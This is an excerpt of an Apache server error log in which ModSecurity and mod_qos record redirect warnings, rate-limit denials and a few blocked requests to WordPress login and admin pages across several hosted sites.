[Tue May 26 19:59:41.311412 2026] [security2:error] [pid 106517:tid 106687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RJQAAAKk"]
[Tue May 26 19:59:41.312616 2026] [security2:error] [pid 93868:tid 94300] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU0qK9k_ZUB2Vp259RAAAAbk"]
[Tue May 26 19:59:41.317389 2026] [security2:error] [pid 93868:tid 94163] [remote 85.215.36.85:58378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 85.36.215.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuVUqK9k_ZUB2Vp259qAAB-Uo"]
[Tue May 26 19:59:41.321568 2026] [security2:error] [pid 93868:tid 94302] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU0qK9k_ZUB2Vp259SwAAAbs"]
[Tue May 26 19:59:41.327348 2026] [security2:error] [pid 106517:tid 106690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU4ZZc2DoU1lPnP1RQgAAAKw"]
[Tue May 26 19:59:41.329175 2026] [security2:error] [pid 93868:tid 94347] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU0qK9k_ZUB2Vp259RwAAAeg"]
[Tue May 26 19:59:41.330514 2026] [security2:error] [pid 93868:tid 94336] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU0qK9k_ZUB2Vp259QwAAAd0"]
[Tue May 26 19:59:41.354018 2026] [security2:error] [pid 93868:tid 94356] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU0qK9k_ZUB2Vp259TQAAAfE"]
[Tue May 26 19:59:41.361828 2026] [security2:error] [pid 93868:tid 94290] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU0qK9k_ZUB2Vp259SAAAAa8"]
[Tue May 26 19:59:41.366735 2026] [security2:error] [pid 106517:tid 106698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVIZZc2DoU1lPnP1RYQAAALQ"]
[Tue May 26 19:59:41.373002 2026] [security2:error] [pid 106517:tid 106715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVIZZc2DoU1lPnP1RYAAAAMU"]
[Tue May 26 19:59:41.376060 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU2DRMqfxdEDkoszzcwAAAF8"]
[Tue May 26 19:59:41.381828 2026] [security2:error] [pid 106517:tid 106714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVIZZc2DoU1lPnP1RZAAAAMQ"]
[Tue May 26 19:59:41.390368 2026] [security2:error] [pid 106517:tid 106702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVIZZc2DoU1lPnP1RaQAAALg"]
[Tue May 26 19:59:41.396829 2026] [security2:error] [pid 93868:tid 94262] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVEqK9k_ZUB2Vp259dQAAAZM"]
[Tue May 26 19:59:41.396853 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVGDRMqfxdEDkoszzngAAAAk"]
[Tue May 26 19:59:41.404436 2026] [security2:error] [pid 93868:tid 94294] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuU0qK9k_ZUB2Vp259TAAAAbM"]
[Tue May 26 19:59:41.404836 2026] [security2:error] [pid 93868:tid 94368] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVEqK9k_ZUB2Vp259dgAAAf0"]
[Tue May 26 19:59:41.409820 2026] [security2:error] [pid 106517:tid 106745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVIZZc2DoU1lPnP1RbQAAAOM"]
[Tue May 26 19:59:41.414036 2026] [security2:error] [pid 93868:tid 94337] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVEqK9k_ZUB2Vp259eAAAAd4"]
[Tue May 26 19:59:41.445743 2026] [security2:error] [pid 93576:tid 93825] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVGDRMqfxdEDkoszzpgAAAHE"]
[Tue May 26 19:59:41.568668 2026] [security2:error] [pid 93868:tid 94339] [client 103.163.220.7:36437] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/edit-tags.php"] [unique_id "ahWuVUqK9k_ZUB2Vp259uAAAAeA"]
[Tue May 26 19:59:41.677152 2026] [qos:error] [pid 93576:tid 93799] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVWDRMqfxdEDkosz0AwAAAFc
[Tue May 26 19:59:41.678641 2026] [qos:error] [pid 106517:tid 106743] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVYZZc2DoU1lPnP1RqgAAAOE
[Tue May 26 19:59:41.678712 2026] [qos:error] [pid 93868:tid 94300] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuVUqK9k_ZUB2Vp2593AAAAbk
[Tue May 26 19:59:41.679565 2026] [qos:error] [pid 93868:tid 94347] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVUqK9k_ZUB2Vp2594wAAAeg
[Tue May 26 19:59:41.679783 2026] [qos:error] [pid 93576:tid 93725] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVWDRMqfxdEDkosz0BQAAAA0
[Tue May 26 19:59:41.682946 2026] [qos:error] [pid 93576:tid 93809] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVWDRMqfxdEDkosz0BwAAAGE
[Tue May 26 19:59:41.687709 2026] [qos:error] [pid 93576:tid 93768] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVWDRMqfxdEDkosz0CgAAADg
[Tue May 26 19:59:41.690326 2026] [qos:error] [pid 93868:tid 94290] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVUqK9k_ZUB2Vp2595wAAAa8
[Tue May 26 19:59:41.690974 2026] [qos:error] [pid 93868:tid 94297] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVUqK9k_ZUB2Vp2596AAAAbY
[Tue May 26 19:59:41.691286 2026] [qos:error] [pid 106517:tid 106708] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVYZZc2DoU1lPnP1RsAAAAL4
[Tue May 26 19:59:41.691541 2026] [qos:error] [pid 106517:tid 106661] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVYZZc2DoU1lPnP1RsQAAAJA
[Tue May 26 19:59:41.691805 2026] [qos:error] [pid 93868:tid 94261] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVUqK9k_ZUB2Vp2596QAAAZI
[Tue May 26 19:59:41.833045 2026] [qos:error] [pid 93576:tid 93778] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVWDRMqfxdEDkosz0EAAAAEI
[Tue May 26 19:59:41.836711 2026] [qos:error] [pid 93868:tid 94326] [client 45.148.10.120:35288] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVUqK9k_ZUB2Vp2597gAAAdM
[Tue May 26 19:59:41.837562 2026] [qos:error] [pid 93576:tid 93740] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVWDRMqfxdEDkosz0EQAAABw
[Tue May 26 19:59:41.840337 2026] [qos:error] [pid 93576:tid 93832] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVWDRMqfxdEDkosz0EgAAAHg
[Tue May 26 19:59:41.843072 2026] [qos:error] [pid 106517:tid 106706] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVYZZc2DoU1lPnP1RvAAAALw
[Tue May 26 19:59:41.845712 2026] [qos:error] [pid 93576:tid 93763] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVWDRMqfxdEDkosz0EwAAADM
[Tue May 26 19:59:41.846235 2026] [qos:error] [pid 106517:tid 106737] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVYZZc2DoU1lPnP1RvQAAANs
[Tue May 26 19:59:41.847348 2026] [qos:error] [pid 93868:tid 94362] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVUqK9k_ZUB2Vp2597wAAAfc
[Tue May 26 19:59:41.847677 2026] [qos:error] [pid 93576:tid 93727] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVWDRMqfxdEDkosz0FQAAAA8
[Tue May 26 19:59:41.847681 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuVWDRMqfxdEDkosz0FAAAAC0
[Tue May 26 19:59:41.849114 2026] [qos:error] [pid 93576:tid 93750] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVWDRMqfxdEDkosz0FgAAACY
[Tue May 26 19:59:41.989226 2026] [qos:error] [pid 93868:tid 94262] [client 45.148.10.120:35288] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVUqK9k_ZUB2Vp2598AAAAZM
[Tue May 26 19:59:41.990789 2026] [qos:error] [pid 93868:tid 94371] [client 45.148.10.120:34920] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVUqK9k_ZUB2Vp2598QAAAgA
[Tue May 26 19:59:41.996362 2026] [qos:error] [pid 106517:tid 106770] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVYZZc2DoU1lPnP1RwgAAAPw
[Tue May 26 19:59:41.997411 2026] [qos:error] [pid 106517:tid 106741] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVYZZc2DoU1lPnP1RwwAAAN8
[Tue May 26 19:59:41.997420 2026] [qos:error] [pid 93576:tid 93827] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuVWDRMqfxdEDkosz0GgAAAHM
[Tue May 26 19:59:42.001524 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0HAAAADs
[Tue May 26 19:59:42.002875 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0HQAAAF4
[Tue May 26 19:59:42.008315 2026] [qos:error] [pid 106517:tid 106735] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVoZZc2DoU1lPnP1RxgAAANk
[Tue May 26 19:59:42.008383 2026] [qos:error] [pid 106517:tid 106758] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuVoZZc2DoU1lPnP1RxwAAAPA
[Tue May 26 19:59:42.027575 2026] [qos:error] [pid 106517:tid 106751] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVoZZc2DoU1lPnP1RzAAAAOk
[Tue May 26 19:59:42.027709 2026] [qos:error] [pid 106517:tid 106715] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVoZZc2DoU1lPnP1RzQAAAMU
[Tue May 26 19:59:42.064687 2026] [security2:error] [pid 106517:tid 106750] [client 103.163.220.8:54905] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/admin.php"] [unique_id "ahWuVoZZc2DoU1lPnP1R0AAAAOg"]
[Tue May 26 19:59:42.147867 2026] [qos:error] [pid 93576:tid 93774] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0IQAAAD4
[Tue May 26 19:59:42.149550 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0IgAAAAg
[Tue May 26 19:59:42.150190 2026] [qos:error] [pid 93868:tid 94306] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVkqK9k_ZUB2Vp259-AAAAb8
[Tue May 26 19:59:42.152537 2026] [qos:error] [pid 93576:tid 93713] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0IwAAAAE
[Tue May 26 19:59:42.156319 2026] [qos:error] [pid 93576:tid 93726] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0JAAAAA4
[Tue May 26 19:59:42.158837 2026] [qos:error] [pid 93868:tid 94271] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVkqK9k_ZUB2Vp259-QAAAZw
[Tue May 26 19:59:42.160160 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0JQAAAFA
[Tue May 26 19:59:42.169207 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0JgAAAHU
[Tue May 26 19:59:42.176245 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0JwAAAHE
[Tue May 26 19:59:42.177424 2026] [qos:error] [pid 93868:tid 94304] [client 45.148.10.120:35230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVkqK9k_ZUB2Vp259-gAAAb0
[Tue May 26 19:59:42.276343 2026] [security2:error] [pid 93868:tid 94344] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVEqK9k_ZUB2Vp259gwAAAeU"]
[Tue May 26 19:59:42.284982 2026] [security2:error] [pid 106517:tid 106766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVIZZc2DoU1lPnP1RagAAAPg"]
[Tue May 26 19:59:42.285527 2026] [security2:error] [pid 93868:tid 94377] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVEqK9k_ZUB2Vp259eQAAAgY"]
[Tue May 26 19:59:42.286937 2026] [security2:error] [pid 93576:tid 93730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVGDRMqfxdEDkoszzpwAAABI"]
[Tue May 26 19:59:42.288503 2026] [security2:error] [pid 106517:tid 106711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVIZZc2DoU1lPnP1RcwAAAME"]
[Tue May 26 19:59:42.292382 2026] [security2:error] [pid 106517:tid 106680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVIZZc2DoU1lPnP1RdQAAAKI"]
[Tue May 26 19:59:42.300540 2026] [security2:error] [pid 106517:tid 106752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVIZZc2DoU1lPnP1RdwAAAOo"]
[Tue May 26 19:59:42.304487 2026] [security2:error] [pid 93576:tid 93736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVGDRMqfxdEDkoszzsQAAABg"]
[Tue May 26 19:59:42.304954 2026] [security2:error] [pid 106517:tid 106651] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVIZZc2DoU1lPnP1ReQAAAIY"]
[Tue May 26 19:59:42.307781 2026] [security2:error] [pid 106517:tid 106728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVIZZc2DoU1lPnP1RcgAAANI"]
[Tue May 26 19:59:42.312876 2026] [security2:error] [pid 106517:tid 106682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVIZZc2DoU1lPnP1RdgAAAKQ"]
[Tue May 26 19:59:42.317120 2026] [security2:error] [pid 93576:tid 93747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVGDRMqfxdEDkoszztQAAACM"]
[Tue May 26 19:59:42.317806 2026] [security2:error] [pid 106517:tid 106659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVIZZc2DoU1lPnP1RfwAAAI4"]
[Tue May 26 19:59:42.318749 2026] [security2:error] [pid 106517:tid 106744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVIZZc2DoU1lPnP1RhQAAAOI"]
[Tue May 26 19:59:42.331850 2026] [security2:error] [pid 93576:tid 93722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVGDRMqfxdEDkoszzqgAAAAo"]
[Tue May 26 19:59:42.332026 2026] [security2:error] [pid 106517:tid 106730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVIZZc2DoU1lPnP1RcQAAANQ"]
[Tue May 26 19:59:42.336875 2026] [security2:error] [pid 106517:tid 106681] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVIZZc2DoU1lPnP1RggAAAKM"]
[Tue May 26 19:59:42.344515 2026] [security2:error] [pid 93576:tid 93773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVGDRMqfxdEDkoszzuAAAAD0"]
[Tue May 26 19:59:42.349883 2026] [security2:error] [pid 106517:tid 106720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVIZZc2DoU1lPnP1RegAAAMo"]
[Tue May 26 19:59:42.356616 2026] [security2:error] [pid 93576:tid 93834] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVWDRMqfxdEDkoszz5QAAAHo"]
